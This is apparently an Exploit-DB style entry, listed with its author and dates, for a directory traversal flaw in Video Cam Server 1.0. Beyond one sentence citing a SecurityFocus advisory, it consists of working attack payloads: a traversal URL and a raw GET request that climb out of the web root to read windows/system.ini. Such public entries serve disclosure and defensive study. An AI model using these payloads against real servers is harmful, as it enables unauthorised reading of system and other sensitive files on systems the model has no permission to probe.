video cam server 1.0 - Directory Traversal
Author: Donato Ferrante type: remote platform: windows port: date_added: 2005-05-02 date_updated: 2013-05-20 verified: 1 codes: tags: aliases: screenshot_url: application_url: raw file: 25571.txt
source: https://www.securityfocus.com/bid/13456/info Video Cam Server is prone to a directory traversal vulnerability that could allow attackers to read files outside the Web root. http://www.example.com/..\..\..\..\..\..\..\..\..\..\..\windows\system.ini GET /../../../../../../../../../../../windows/system.ini HTTP/1.1